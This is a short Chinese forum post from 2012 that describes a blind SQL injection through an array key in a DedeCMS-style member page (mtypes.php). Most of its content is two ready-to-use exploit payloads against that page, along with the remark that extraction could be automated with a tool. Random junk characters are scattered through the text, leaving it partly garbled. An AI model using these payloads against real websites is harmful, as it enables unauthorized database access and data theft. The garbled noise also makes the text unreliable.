需要magic_quotes_gpc = Off,所以说是鸡肋啊.4 }, J0 ^, B( a4 |2 r! \: r: V
1 |, D* z: ~; X v' V+ o' U3 j $ b4 F# e/ b ^5 c9 C- t
发生在数组key里的注射漏洞,有点意思.
`& b0 t+ G1 m0 D; [ , t5 N' b% f% L& H
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
. |; n4 c) h- O1 |
! f2 C5 a5 A2 s- Q7 chttp://www.xxx.com /dede/member/mtypes.php?dopost=save
7 b( l: [; a* C2 d5 c0 k8 D % F9 f* m; u" r& G" ?2 {5 z
exploit:
; b+ }2 ?) B8 I: ^mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
/ l+ q q" ]4 Amtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
2 \- z# F: X8 |, o( o |
发表于 2012-12-20 08:08:09
收藏
支持
反对